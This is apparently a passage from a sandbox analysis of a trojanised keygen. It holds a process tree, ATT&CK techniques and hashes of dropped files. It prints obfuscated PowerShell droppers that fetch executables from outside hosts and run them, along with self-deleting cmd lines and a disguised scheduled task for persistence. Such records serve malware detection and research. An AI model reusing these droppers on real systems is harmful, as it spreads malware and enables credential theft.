C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4880 & erase C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe & RD /S /Q C:\\ProgramData\\991295832238767\\* & exit11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 488012⤵
- Kills process with taskkill
-
C:\Users\Public\vkr.exe"C:\Users\Public\vkr.exe"9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}6⤵
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""7⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\timeout.exetimeout 16⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}6⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Public\mwh.exe"C:\Users\Public\mwh.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rmfigo.vbs"9⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"10⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dvdljtaccvivylcfphls.vbs"11⤵
-
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"12⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exeC:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe13⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4888 & erase C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe & RD /S /Q C:\\ProgramData\\558898630531236\\* & exit14⤵
- Checks whether UAC is enabled
- Maps connected drives based on registry
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 488815⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exeC:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe11⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
-
C:\Users\Admin\AppData\Local\Temp\cc.exe"C:\Users\Admin\AppData\Local\Temp\cc.exe"12⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\cc.exeC:\Users\Admin\AppData\Local\Temp\cc.exe13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"14⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\pm.exe"C:\Users\Admin\AppData\Local\Temp\pm.exe"12⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exeC:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"12⤵
- Checks whether UAC is enabled
- Maps connected drives based on registry
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 313⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\mwh.exeC:\Users\Admin\AppData\Local\Temp\mwh.exe9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}6⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Public\gev.exe"C:\Users\Public\gev.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rmfigo.vbs"9⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"10⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dvdljtaccvivylcfphls.vbs"11⤵
-
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"12⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exeC:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe13⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4964 & erase C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe & RD /S /Q C:\\ProgramData\\899417348964903\\* & exit14⤵
- Checks whether UAC is enabled
- Maps connected drives based on registry
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 496415⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exeC:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\gev.exeC:\Users\Admin\AppData\Local\Temp\gev.exe9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\gev.exeC:\Users\Admin\AppData\Local\Temp\gev.exe9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 144410⤵
- Maps connected drives based on registry
- Program crash
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}6⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""7⤵
- Blocklisted process makes network request
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}6⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""7⤵
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Hidden Files and Directories
1Defense Evasion
Modify Registry
7Install Root Certificate
1Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe.logMD5
e515039a8d5a085ff2e6b44d1a17a958
SHA1f8a766108bde32e852915233bc043d6d7f8b74ec
SHA256ee7d04f722b7f7c9750d2aad4919cc80b249593558a0b18ca818e0f64279d5f2
SHA512bfe36952331f835f1b7c545ed39d57b910a0d4a922a05de4f813b5121dbd6dee5418bd43cb3b5e383d22d8860436c13c39d2e2133894dd1f31091d5cd1437f21
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
b751492c41c6f3173d3b6f31c1b9b4eb
SHA1abc53a2c939b1d774940deb0b888b7b1ba5a3c7b
SHA256ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457
SHA512afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9435f4a6d08a94281171d9032dd89062
SHA1f8f87a03c3f304cbf4293aed2b0f085109a518de
SHA25625a9918b84aac24776f9c569d39af30cd800018e4d789f991eef6eaea0e269c1
SHA512d66952b63b293acf2ee0338a1947fa9d45ca3bcdad25f701f6978e911499ed3fed60a76a4e196e9e36f4683f443e602599934d5d3f59dac21cec86f00c9c56b4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9435f4a6d08a94281171d9032dd89062
SHA1f8f87a03c3f304cbf4293aed2b0f085109a518de
SHA25625a9918b84aac24776f9c569d39af30cd800018e4d789f991eef6eaea0e269c1
SHA512d66952b63b293acf2ee0338a1947fa9d45ca3bcdad25f701f6978e911499ed3fed60a76a4e196e9e36f4683f443e602599934d5d3f59dac21cec86f00c9c56b4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
24826852c60807bbddbe6525291292d8
SHA17cfe7e335afd0fb7b6f88ab207e00cc7af227710
SHA25641744e48bc70ffd32c77198ee8ec1b5bff7a41f8f485f618d8571cb0766f042e
SHA51262941ee6050a6f0f0309f63f2c1fbf53b9d08784bc38de46a300b3da028fa26be3031e494e7ef9b6bd780c437021935f5faff18ebe2162f88580844f72a0596a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
82c6445c587f733b6763e2af371b2898
SHA1685f88c18918031c2e2baf519ad2b9c2ecefac70
SHA256b6d9b5bc254dbe7bda4877679cc0db95fa8695940b9c3dec362191a1af22bb2a
SHA51298d19b3a51a37b1b1cfa43122f3fa4db25ba86ecc0b894ca5f8fb409105ec1e9579044b1aa648e41ee95f4ebddfe68b6aabb1a08c7a6a6fc4780d6a0ecaaaf6e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
82c6445c587f733b6763e2af371b2898
SHA1685f88c18918031c2e2baf519ad2b9c2ecefac70
SHA256b6d9b5bc254dbe7bda4877679cc0db95fa8695940b9c3dec362191a1af22bb2a
SHA51298d19b3a51a37b1b1cfa43122f3fa4db25ba86ecc0b894ca5f8fb409105ec1e9579044b1aa648e41ee95f4ebddfe68b6aabb1a08c7a6a6fc4780d6a0ecaaaf6e
-
C:\Users\Admin\AppData\Local\Temp\1D34.tmp\Keygen.exeMD5
ea2c982c12fbec5f145948b658da1691
SHA1d17baf0b8f782934da0c686f2e87f019643be458
SHA256eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4
SHA5121f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8
-
C:\Users\Admin\AppData\Local\Temp\1D34.tmp\Keygen.exeMD5
ea2c982c12fbec5f145948b658da1691
SHA1d17baf0b8f782934da0c686f2e87f019643be458
SHA256eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4
SHA5121f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8
-
C:\Users\Admin\AppData\Local\Temp\1D34.tmp\b.htaMD5
5bbba448146acc4530b38017be801e2e
SHA18c553a7d3492800b630fc7d65a041ae2d466fb36
SHA25696355db8fd29dcb1f30262c3eac056ff91fd8fa28aa331ed2bedd2bd5f0b3170
SHA51248e3d605b7c5531cb6406c8ae9d3bd8fbb8f36d7dd7a4cbe0f23fc6ef2df08267ce50d29c7ec86bf861ebdcf9e48fb9c61c218f6584f1a9a0289a10a2fec730b
-
C:\Users\Admin\AppData\Local\Temp\1D34.tmp\b1.htaMD5
c57770e25dd4e35b027ed001d9f804c2
SHA1408b1b1e124e23c2cc0c78b58cb0e595e10c83c0
SHA256bb0fd0011d5a0c1bbb69cb997700eb329eee7bed75fef677122fcfda78edc7f5
SHA512ac6d957d2b6218d9c19dea60b263d6148f730a7a4599e03023afc0881b9f4051d20e5f1d94fc3e416c5e12bcc9846a43af90f55767271ef0cc4b84f31f432ae7
-
C:\Users\Admin\AppData\Local\Temp\1D34.tmp\ba.htaMD5
b762ca68ba25be53780beb13939870b2
SHA11780ee68efd4e26ce1639c6839c7d969f0137bfd
SHA256c15f61a3c6397babdf83b99b45345fec9851c4d3669c95b717f756b7c48050d1
SHA512f99570d2dae550cb1474e2d1cabf8296a685e0e7254d92eb21d856acb8dece635a0842a00d63da2a4faa18c52c57244c565d6a752c857d5c15e8c23b3d4a9e1a
-
C:\Users\Admin\AppData\Local\Temp\1D34.tmp\ba1.htaMD5
a2ea849e5e5048a5eacd872a5d17aba5
SHA165acf25bb62840fd126bf8adca3bb8814226e30f
SHA2560c4ffba2e00da7c021d0dcab292d53290a4dc4d067c029e5db30ba2ac094344c
SHA512d4e53c150e88f31c9896decfaa9f0a8dfab5d6d9691af162a6c0577786620fb1f3617398fc257789a52e0988bf1bfc94255db6d003397863b0b9e82afabdb89f
-
C:\Users\Admin\AppData\Local\Temp\1D34.tmp\m.htaMD5
9383fc3f57fa2cea100b103c7fd9ea7c
SHA184ea6c1913752cb744e061ff2a682d9fe4039a37
SHA256831e8ee7bc3eeeaaa796a34cbb080658dec1be7eb26eb2671353f650041b220d
SHA51216eda09f6948742933b6504bc96eb4110952e95c4be752e12732cb3b92db64daa7a7a0312ca78ff1ceb7cffd7bd8a7d46514226fc3cea375b4edb02a98422600
-
C:\Users\Admin\AppData\Local\Temp\1D34.tmp\m1.htaMD5
5eb75e90380d454828522ed546ea3cb7
SHA145c89f292d035367aeb2ddeb3110387a772c8a49
SHA256dd43305abbbe5b6cc4ab375b6b0c9f8667967c35bb1f6fefb0f1a59c7c73bd5e
SHA5120670ef4f687c4814125826b996d10f6dd8a1dd328e04b9c436ee657486b27b1eefad5b82dcc25bd239d36b7ac488f98e5adcff56c5e82f7d0ed41f03301947c4
-
C:\Users\Admin\AppData\Local\Temp\1D34.tmp\start.batMD5
68d86e419dd970356532f1fbcb15cb11
SHA1e9ef9a9d047f1076ba2afbe4eabec2ea2338fb0a
SHA256d150a28b978b2d92caac25ee0a805dec96381471702a97f1099707b8538c6cbe
SHA5123078c8c33b18ca1aa3bb2f812e5f587f5b081a4bd857f942ab382383faf09dbe8af38054546bf49037b79081c9406dc25647ae5bd843abc8fcca25c7b3afae14
-
C:\Users\Admin\AppData\Local\Temp\872D.tmp\Microsoft.VisualStudio.Package.LanguageService.11.0.exeMD5
89158e00639d9ef6ee9337b4f19e74f4
SHA1dc0f6e9025c284b3071dbfc6f1a8b8c0c639fce8
SHA2569f46c479aacf5bb3810ab29c4f2950c34902aaf864bccd844f54d121a75d0b1d
SHA512c23832cd017aa36dca87308aa0cbc5a3c710e34ba46bd5f689031740d235537c9d226b1de57bcc8823236959561ada368789a6cf5a49a4cbe7ee1781af366add
-
C:\Users\Admin\AppData\Local\Temp\872D.tmp\Microsoft.VisualStudio.Package.LanguageService.11.0.exeMD5
89158e00639d9ef6ee9337b4f19e74f4
SHA1dc0f6e9025c284b3071dbfc6f1a8b8c0c639fce8
SHA2569f46c479aacf5bb3810ab29c4f2950c34902aaf864bccd844f54d121a75d0b1d
SHA512c23832cd017aa36dca87308aa0cbc5a3c710e34ba46bd5f689031740d235537c9d226b1de57bcc8823236959561ada368789a6cf5a49a4cbe7ee1781af366add
-
C:\Users\Admin\AppData\Local\Temp\872D.tmp\bb.exeMD5
347d7700eb4a4537df6bb7492ca21702
SHA1983189dab4b523e19f8efd35eee4d7d43d84aca2
SHA256a9963808a1a358d6ee26ab88bdab4add50512de1a863aa79937815444ee64da8
SHA5125efb1bce5b5fe74c886126c7bf3627628842a73d31550aee61b71e462b0cc4256b07ae2dc8c207917c5e134c15b8b1d5f3bbbd76724a9b12188f32ba48c25ac9
-
C:\Users\Admin\AppData\Local\Temp\872D.tmp\bb.exeMD5
347d7700eb4a4537df6bb7492ca21702
SHA1983189dab4b523e19f8efd35eee4d7d43d84aca2
SHA256a9963808a1a358d6ee26ab88bdab4add50512de1a863aa79937815444ee64da8
